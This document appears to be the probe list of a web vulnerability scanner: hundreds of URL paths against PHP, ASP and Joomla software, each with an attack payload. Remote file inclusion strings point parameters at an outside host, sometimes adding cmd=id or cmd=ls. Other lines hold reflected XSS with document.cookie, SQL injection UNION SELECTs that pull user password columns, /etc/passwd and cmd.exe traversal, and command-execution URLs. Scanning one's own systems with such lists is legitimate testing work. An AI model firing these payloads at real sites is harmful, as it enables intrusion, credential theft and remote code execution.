SPHERA/login/sm_login_screen.php?uid=\x5C\x22><script>alert('Vulnerable')</script>
SPIP-v1-7-2/inc-calcul.php3?squelette_cache=http://www.yxlink.com/nvs_test.txt?
SQLQHit.asp
SQLServ/sqlbrowse.asp?filepath=c:\x5C&Opt=3
SQuery/lib/gore.php?libpath=http://www.yxlink.com/nvs_test.txt
SSI.php?function=recentTopics&ID_MEMBER=1+OR+1=1)+LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_BOARD=t.ID_BOARD+AND+lmr.ID_MEMBER=1+OR+1=1)+UNION+SELECT+ID_MEMBER,+md5(333),null,passwd,null,passwd,null,null,null,null,null,null+FROM+yabbse_members+/*
SUNWmc/htdocs/
SUNWmc/htdocs/en_US/
Satk/javascript/class.atkdateattribute.js.php?config_atkroot=http://www.yxlink.com/nvs_test.txt
SazCart/admin/alayouts/default/pages/login.php?_saz[settings][site_url]=http://www.yxlink.com/nvs_test.txt?
SazCart/layouts/default/header.saz.php?_saz[settings][site_dir]=http://www.yxlink.com/nvs_test.txt?
ScriptPage/source/includes/load_forum.php?mfh_root_path=http://www.yxlink.com/nvs_test.txt 
ScriptPath/footers.php?tinybb_footers=http://www.yxlink.com/nvs_test.txt
ScriptPath/index.php?page=http://www.yxlink.com/nvs_test.txt
Script_Path/config.inc.php?_path=http://www.yxlink.com/nvs_test.txt?
Scripts/app_and_readme/navigator/index.php?page=http://www.yxlink.com/nvs_test.txt
Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=http://www.yxlink.com/nvs_test.txt
Search
ServiceRegistry/HelpSearch.do?searchTerm=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3C
SilverStream
SilverStream/Meta/Tables/?access-mode=text
SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator
SiteServer/Knowledge/Default.asp?ctr=\x5C\x22><script>alert('Vulnerable')</script>
Somery/team.php?checkauth=http://www.yxlink.com/nvs_test.txt
Sources/Packages.php?sourcedir=http://www.yxlink.com/nvs_test.txt
Survey/Survey.Htm
T0p.php
TiVoConnect?Command=QueryContainer&Container=/&Recurse=Yes
TiVoConnect?Command=QueryServer
TopSitesdirectory/help.php?sid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
Upload/install.php?skindir=http://www.yxlink.com/nvs_test.txt
User/images/css/css.css
UserCenter/login.aspx
UserCenter/register.aspx
UserFiles/1.asp;1(1).jpg
UserFiles/File/1.asp;1(1).jpg
UserFiles/Image/1.asp;1(1).jpg
WEB-INF/web.xml
WEBAGENT/CQMGSERV/CF-SINFO.TPF
WINDMAIL.EXE?%20-n%20c:\x5Cboot.ini%
WebEditor/Authentication/LoginPage.aspx?ReturnUrl=%2fWebEditor%2fDefault.aspx&errMsg=User+is+locked.+Too+many+logon+attempts.\x22><script>alert('XSS-By-Lament')</script>
WebResource.axd?d=
WebResource.axd?d=nvs_test
Widgets/Base/Footer.php?sys_dir=http://www.yxlink.com/nvs_test.txt
Widgets/Base/widget.BifContainer.php?sys_dir=http://www.yxlink.com/nvs_test.txt
Widgets/Base/widget.BifRoot.php?sys_dir=http://www.yxlink.com/nvs_test.txt
Widgets/Base/widget.BifRoot2.php?sys_dir=http://www.yxlink.com/nvs_test.txt
Widgets/Base/widget.BifRoot3.php?sys_dir=http://www.yxlink.com/nvs_test.txt
Widgets/Base/widget.BifWarning.php?sys_dir=http://www.yxlink.com/nvs_test.txt
WordPress_Files/All_Users/wp-content/plugins/Enigma2.php?boarddir=http://www.yxlink.com/nvs_test.txt?
Xcelerate/LoginPage.html
YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>
[path]/mybic_server.php?file=http://www.yxlink.com/nvs_test.txt
[path]/previewtheme.php?theme=1&inc_path=http://www.yxlink.com/nvs_test.txt?cmd
\x5C\x22><img%20src=\x5C\x22javascript:alert(document.domain)\x5C\x22>
_administration/securite.php?cfg[document_uri]=http://www.yxlink.com/nvs_test.txt
_basicfunctions.php?DIR=http://www.yxlink.com/nvs_test.txt
_blogadata/include/struct_admin.php?incl_page=http://www.yxlink.com/nvs_test.txt?
_conf/_php-core/common-tpl-vars.php?admindir=http://www.yxlink.com/nvs_test.txt
_connect.php?root=http://www.yxlink.com/nvs_test.txt
_friendly/core/data/_load.php?friendly_path=http://www.yxlink.com/nvs_test.txt
_friendly/core/data/yaml.inc.php?friendly_path=http://www.yxlink.com/nvs_test.txt
_friendly/core/display/_load.php?friendly_path=http://www.yxlink.com/nvs_test.txt
_friendly/core/support/_load.php?friendly_path=http://www.yxlink.com/nvs_test.txt
_functions.php?prefix=http://www.yxlink.com/nvs_test.txt
_includes/settings.inc.php?approot=http://www.yxlink.com/nvs_test.txt
_layouts/help.aspx?cid0=MS.WSS.manifest.xml%00%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&tid=X
_mem_bin/auoconfig.asp
_mem_bin/formslogin.asp?\x5C\x22><script>alert('Vulnerable')</script>
_mem_bin/remind.asp
_pages
_theme/breadcrumb.php?rootBase=http://www.yxlink.com/nvs_test.txt
_vti_bin/
_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
_vti_bin/_vti_adm/admin.dll
_vti_bin/_vti_aut/fp30reg.dll?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
_vti_bin/fpcount.exe
_vti_bin/fpcount.exe/
_vti_bin/shtml.exe/junk_nonexistant.exe
_vti_inf.html
_vti_pvt/botinfs.cnf
_vti_pvt/bots.cnf
_wk/wk_lang.php?WK[wkPath]=http://www.yxlink.com/nvs_test.txt
a%5c.aspx
a.jsp/<script>alert('Vulnerable')</script>
a.php
a?<script>alert('Vulnerable')</script>
a_security.htm
ab2/Help_C/\x5C@Ab2HelpSearch?scope=HELP&DwebQuery=<script>alert(Vulnerable)</script> 
abf_js.php?abs_pfad=http://www.yxlink.com/nvs_test.txt?&cmd=id
about.php?CONFIG[MWCHAT_Libs]=http://www.yxlink.com/nvs_test.txt?
about.php?bibtexrootrel=http://www.yxlink.com/nvs_test.txt?
about.php?inc_dir=http://www.yxlink.com/nvs_test.txt
about/?module=../robots.txt&fmodule=7
aboutinfo.php?bibtexrootrel=http://www.yxlink.com/nvs_test.txt?
aboutus.php?type=1%27+aNd+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((Select+(md5(333))),1,62)))a+from+information_schema.tables+group+by+a)b)+and+%27z%27=%27z
abxaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaeada.php?a=<script>alert(32233333)</script>
acart2_0/admin/error.asp?msg=<script>alert(\x5C\x22test\x5C\x22)</script>
acart2_0/admin/index.asp?msg=<script>alert(\x5C\x22test\x5C\x22)</script>
acart2_0/deliver.asp?msg=<script>alert(\x5C\x22test\x5C\x22)</script>
acart2_0/error.asp?msg=<script>alert(\x5C\x22test\x5C\x22)</script>
acart2_0/signin.asp?msg=<script>alert(\x5C\x22test\x5C\x22)</script>
acc.php?page=http://www.yxlink.com/nvs_test.txt
access/login.php?path_to_root=http://www.yxlink.com/nvs_test.txt
account.php?insPath=http://www.yxlink.com/nvs_test.txt
accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.yxlink.com/nvs_test.txt
accsess/login.php?path_to_root=http://www.yxlink.com/nvs_test.txt
achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://www.yxlink.com/nvs_test.txt
action=chooseDirectory&currentPath='\x22>><script>alert(111)</script>
action=submit&Name=1&EmailAddress=1&AccountUsername=1&Message=</t extarea><script>alert('XSS Vulnerability')%3B</script>
actions/ipn.php?config[plugin_dir]=http://www.yxlink.com/nvs_test.txt
active.log
active/components/xmlrpc/client.php?c[components]=http://www.yxlink.com/nvs_test.txt
ad_main.php?_mygamefile=http://www.yxlink.com/nvs_test.txt
add.cgi.php?blog_theme=http://www.yxlink.com/nvs_test.txt
add.php
add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script>
add_link.php?blog_theme=http://www.yxlink.com/nvs_test.txt
add_user.php
addpost_newpoll.php?addpoll=preview&thispath=http://www.yxlink.com/nvs_test.txt
addressbook.php?GLOBALS[basedir]=http://www.yxlink.com/nvs_test.txt?
addressbook.php?\x5C\x22><script>alert(Vulnerable)</script><!--
addressbook/index.php?name=<script>alert('Vulnerable')</script>
addressbook/index.php?surname=<script>alert('Vulnerable')</script>
addsite.php?returnpath=http://www.yxlink.com/nvs_test.txt
addvip.php?msetstr[\x5C\x22PROGSDIR\x5C\x22]=http://www.yxlink.com/nvs_test.txt
addyoursite.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;
adm/file.cgi?next_file=%2fetc%2fpasswd
adm/file.cgi?next_file=%3Cscript%3Ealert(1)%3C/script%3E
adm/file.cgi?todo=xss&this_file=%3cscript%3ealert(1)%3c/script%3e
adm/krgourl.php?DOCUMENT_ROOT=http://www.yxlink.com/nvs_test.txt?
adm/my_statistics.php?DOCUMENT_ROOT=http://www.yxlink.com/nvs_test.txt?
admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv
admin.cgi
admin.html
admin.loudmouth.php?mainframe=http://www.yxlink.com/nvs_test.txt
admin.php
admin.php?Madoa=http://www.yxlink.com/nvs_test.txt?
admin.php?cal_dir=http://www.yxlink.com/nvs_test.txt
admin.php?env_dir=http://www.yxlink.com/nvs_test.txt
admin.php?lang=http://www.yxlink.com/nvs_test.txt
admin.php?m=Theme&a=Edit&path=/index.php
admin.php?module=banlist&curr=1\x22><img/src/onerror=\x22alert(222);&delete=1
admin.php?page=configuration&amp;section=%22%3E%3Cscript%3Ealert%28document.cookie%29; %3C/script%3E
admin.php?page[path]=http://www.yxlink.com/nvs_test.txt?&cmd=ls
admin.php?submit=submit&form_include_template=http://www.yxlink.com/nvs_test.txt
admin/
admin/?kerberos=onmouseover=alert(1)&kerberos
admin/Category_GetSearch.aspx?key=%27%20and%201=2%20union%20select%201,2,3,4,5,888888888-1%20from%20[t_admin]--
admin/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
admin/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
admin/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
admin/PLUGINs/NP_UserSharing.php?DIR_ADMIN=http://www.yxlink.com/nvs_test.txt
admin/PLUGINs/NP_UserSharing.php?DIR_ADMIN=http://www.yxlink.com/nvs_test.txt?admin
admin/ST_countries.php?include_path=http://www.yxlink.com/nvs_test.txt?
admin/ST_platforms.php?include_path=http://www.yxlink.com/nvs_test.txt?
admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname,7,8,9,password,8888888899999999-1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35%20from%20aspcms_user%20where%20userid=1
admin/addentry.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
admin/addentry.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?
admin/addons/archive/archive.php?adminfolder=http://www.yxlink.com/nvs_test.txt
admin/admin.php?page=yourcode.txt?&cmd=id
admin/admin.php?path=http://www.yxlink.com/nvs_test.txt
admin/admin.php?site_url=http://www.yxlink.com/nvs_test.txt
admin/admin.php?vwar_root=http://www.yxlink.com/nvs_test.txt
admin/admin_cash.php?setmodules=1&phpbb_root_path=http://www.yxlink.com/nvs_test.txt
admin/admin_forgotten_password.php?root_folder_path=http://www.yxlink.com/nvs_test.txt
admin/admin_news_bot.php?root_path=http://www.yxlink.com/nvs_test.txt?
admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=http://www.yxlink.com/nvs_test.txt
admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://www.yxlink.com/nvs_test.txt
admin/admin_users.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
admin/airline-edit.php?fid=-2+union+select+1,2,3,md5(333),5,6,7,8+from+information_schema.tables+where+table_schema=database()--
admin/auth.php?xcart_dir=http://www.yxlink.com/nvs_test.txt
admin/auth/secure.php?cfgProgDir=http://www.yxlink.com/nvs_test.txt?
admin/autoclose.php?subd=http://www.yxlink.com/nvs_test.txt
admin/autoprompter.php?CONFIG[BASE_PATH]=http://www.yxlink.com/nvs_test.txt
admin/bin/patch.php?INSTALL_FOLDER=http://www.yxlink.com/nvs_test.txt
admin/browse.asp?FilePath=c:\x5C&Opt=2&level=0
admin/catagory.php?language=http://www.yxlink.com/nvs_test.txt
admin/classes/pear/OLE/PPS.php?homedir=http://www.yxlink.com/nvs_test.txt
admin/classes/pear/OLE/PPS/File.php?homedir=http://www.yxlink.com/nvs_test.txt
admin/classes/pear/OLE/PPS/Root.php?homedir=http://www.yxlink.com/nvs_test.txt
admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir=http://www.yxlink.com/nvs_test.txt
admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php?homedir=http://www.yxlink.com/nvs_test.txt
admin/classes/pear/Spreadsheet/Excel/Writer/Format.php?homedir=http://www.yxlink.com/nvs_test.txt
admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php?homedir=http://www.yxlink.com/nvs_test.txt
admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php?homedir=http://www.yxlink.com/nvs_test.txt
admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir=http://www.yxlink.com/nvs_test.txt
admin/cms/htmltags.php?datei=./sec/data.php
admin/code/index.php?load_page=http://www.yxlink.com/nvs_test.txt
admin/comment.php?config[installdir]=http://www.yxlink.com/nvs_test.txt
admin/common-menu.php?CONF[local_path]=http://www.yxlink.com/nvs_test.txt
admin/common.inc.php?base_path=http://www.yxlink.com/nvs_test.txt
admin/config.php?display=did&didfilter=&extdisplay=12%22%20union%20select%20username,md5(333),sections,%221%22,%222%22,%223%22,%224%22,%225%22,%226%22,%227%22,%228%22,%229%22,%2210%22,%2211%22,%2212%22%20from%20ampusers%20where%20%22%22=%22
admin/config_settings.tpl.php?include_path=http://www.yxlink.com/nvs_test.txt?&cmd=id
admin/customer-edit.php?cid=-2+union+select+1,2,3,md5(333),5,6,7,8+from+information_schema.tables+where+table_schema=database()--
admin/db.php?dump_sql=1
admin/directory.php?config[installdir]=http://www.yxlink.com/nvs_test.txt
admin/eWebEditorNet/admin/login.aspx
admin/eWebEditorNet/admin_login.aspx
admin/editor/admin/login.aspx
admin/editor/admin/login.php
admin/editor/admin_login.asp
admin/editor/admin_login.aspx
admin/editor/admin_login.php
admin/editor/login.asp
admin/eweb/admin/login.asp
admin/eweb/admin/login.aspx
admin/eweb/admin/login.jsp
admin/eweb/admin/login.php
admin/eweb/admin_login.asp
admin/eweb/admin_login.aspx
admin/eweb/admin_login.jsp
admin/eweb/admin_login.php
admin/ewebeditor/admin/login.aspx
admin/ewebeditor/admin/login.php
admin/ewebeditor/admin_login.asp
admin/ewebeditor/admin_login.aspx
admin/ewebeditor/admin_login.php
admin/ewebeditor/login.asp
admin/exec.php3?cmd=cat%20/etc/passwd
admin/exec.php3?cmd=dir%20c:\x5C\x5C
admin/exec.php3?cmd=id
admin/frontpage_right.php?loadadminpage=http://www.yxlink.com/nvs_test.txt
admin/header.php?loc=http://www.yxlink.com/nvs_test.txt
admin/image/login.css
admin/images/css.css
admin/inc/add.php?format_menue=http://www.yxlink.com/nvs_test.txt
admin/inc/change_action.php?format_menue=http://www.yxlink.com/nvs_test.txt
admin/include/common.php?commonIncludePath=http://www.yxlink.com/nvs_test.txt?
admin/include/header.php?repertoire=http://www.yxlink.com/nvs_test.txt
admin/include/lib.module.php?mod_root=http://www.yxlink.com/nvs_test.txt
admin/includes/admin_header.php?level=http://www.yxlink.com/nvs_test.txt
admin/includes/author_panel_header.php?level=http://www.yxlink.com/nvs_test.txt
admin/includes/header.php?bypass_installed=1&secure_page_path=http://www.yxlink.com/nvs_test.txt%00
admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.yxlink.com/nvs_test.txt?
admin/index.asp
admin/index.php?act=login&username='%20UNION%20SELECT%20id,name, '3858f62230ac3c915f300c664312c63f',email,notify,md5(333),session%20FROM%20 pafaq_admins%20WHERE%201/*&password=foobar
admin/index.php?path_to_script=http://www.yxlink.com/nvs_test.txt?&cmd=ls
admin/index.php?pg=http://www.yxlink.com/nvs_test.txt?
admin/index.php?xtrphome=http://www.yxlink.com/nvs_test.txt
admin/index1.asp
admin/index_sitios.php?_VIEW=http://www.yxlink.com/nvs_test.txt
admin/lib_action_step.php?GLOBALS[CLASS_PATH]=http://www.yxlink.com/nvs_test.txt
admin/login.jsp
admin/login.php/\x22><script>alert(133)</script>
admin/login.php?absolute_path=http://www.yxlink.com/nvs_test.txt
admin/login.php?path=\x5C\x22></form><form name=a><input name=i value=XSS>&lt;script>alert('Vulnerable')</script>
admin/news.admin.php?path_to_script=http://www.yxlink.com/nvs_test.txt?&cmd=ls
admin/news.php?language=http://www.yxlink.com/nvs_test.txt
admin/phpinfo.php
admin/phpshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=<sessid>
admin/plugins/Online_Users/main.php?GLOBALS[PT_Config][dir][data]=http://www.yxlink.com/nvs_test.txt
admin/sendmsg.php?config[installdir]=http://www.yxlink.com/nvs_test.txt
admin/servlet/org.apache.catalina.servlets.DefaultServlet/index.jsp
admin/setup/level2.php?dir=http://www.yxlink.com/nvs_test.txt
admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&ReturnURL=\x5C\x22><script>alert(document.cookie)</script>
admin/system.php3?cmd=cat%20/etc/passwd
admin/system.php3?cmd=dir%20c:\x5C\x5C
admin/system/config/conf-activation.php?site_path=http://www.yxlink.com/nvs_test.txt
admin/system/include.php?skindir=http://www.yxlink.com/nvs_test.txt
admin/system/include.php?start=1&skindir=http://www.yxlink.com/nvs_test.txt
admin/system/menu/item.php?site_path=http://www.yxlink.com/nvs_test.txt
admin/system/modules/conf_modules.php?site_path=http://www.yxlink.com/nvs_test.txt
admin/templates/default/index.tpl.php
admin/templates/template_thumbnail.php?thumb_template=http://www.yxlink.com/nvs_test.txt
admin/testing/tests/0004_init_urls.php?init_path=http://www.yxlink.com/nvs_test.txt
admin/testing/tests/0004_init_urls.php?init_path=http://www.yxlink.com/nvs_test.txt?&
admin/themes.php?config[installdir]=http://www.yxlink.com/nvs_test.txt
admin/tools/utf8conversion/index.php?path=http://www.yxlink.com/nvs_test.txt?
admin/ueueBrowse/example.A?view=rss&feedType=<script>alert(111)</script>
admin/user_user.php?language=http://www.yxlink.com/nvs_test.txt
admin/webeditor/admin_login.asp
admin868/
admin_aspcms/_content/_tag/aspcms_tag.asp
admin_aspcms/index.asp
admincp/auth/checklogin.php?cfgProgDir=http://www.yxlink.com/nvs_test.txt
admincp/auth/secure.php?cfgProgDir=http://www.yxlink.com/nvs_test.txt
admincp/cronadmin.php?nextitem[filename]=http://www.yxlink.com/nvs_test.txt
admincp/diagnostic.php?api[classname]=http://www.yxlink.com/nvs_test.txt
admincp/diagnostic.php?match[0]=http://www.yxlink.com/nvs_test.txt
admincp/plugin.php?safeid=http://www.yxlink.com/nvs_test.txt
adminhead.php?path[docroot]=http://www.yxlink.com/nvs_test.txt
admini/admin.php?INC=http://www.yxlink.com/nvs_test.txt?
admini/index.php?INC=http://www.yxlink.com/nvs_test.txt?
administer/
administrator/
administrator/admin.php?site_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.yxlink.com/nvs_test.txt
administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=http://www.yxlink.com/nvs_test.txt
administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=http://www.yxlink.com/nvs_test.txt
administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=http://www.yxlink.com/nvs_test.txt
administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=http://www.yxlink.com/nvs_test.txt
administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.yxlink.com/nvs_test.txt
administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=http://www.yxlink.com/nvs_test.txt
administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=http://www.yxlink.com/nvs_test.txt
administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= http://www.yxlink.com/nvs_test.txt
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.yxlink.com/nvs_test.txt
administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=http://www.yxlink.com/nvs_test.txt
administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_events/admin.events.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.yxlink.com/nvs_test.txt
administrator/components/com_extended_registration/admin.extended_registration.php?mosConfig_absolute_path= http://www.yxlink.com/nvs_test.txt
administrator/components/com_extended_registration/admin.extended_registration.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=http://www.yxlink.com/nvs_test.txt
administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.yxlink.com/nvs_test.txt
administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.yxlink.com/nvs_test.txt
administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_jreactions/langset.php?comPath=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=http://www.yxlink.com/nvs_test.txt
administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.yxlink.com/nvs_test.txt
administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_tour_toto/admin.tour_toto.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=http://www.yxlink.com/nvs_test.txt
administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.yxlink.com/nvs_test.txt
administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_wmtrssreader/admin.wmtrssreader.php?mosConfig_live_site=http://www.yxlink.com/nvs_test.txt?
administrator/gallery/gallery.php?directory=\x5C\x22<script>alert(document.cookie)</script>
administrator/gallery/navigation.php?directory=\x5C\x22<script>alert(document.cookie)</script>
administrator/gallery/uploadimage.php?directory=\x5C\x22<script>alert(document.cookie)</script>
administrator/gallery/view.php?path=\x5C\x22<script>alert(document.cookie)</script>
administrator/index2.php?PHPSESSID=1&myname=admin&full \x5Cnname=admin&userid=administrator
administrator/menu_add.php?site_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/menu_operation.php?site_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/phpinfo.php
administrator/popups/sectionswindow.php?type=web&link=\x5C\x22<script>alert(document.cookie)</script>
administrator/upload.php?newbanner=1&choice=\x5C\x22<script>alert(document.cookie)</script>
adminlogin/
adminpanel/includes/add_forms/addmp3.php?GLOBALS[root_path]=http://www.yxlink.com/nvs_test.txt
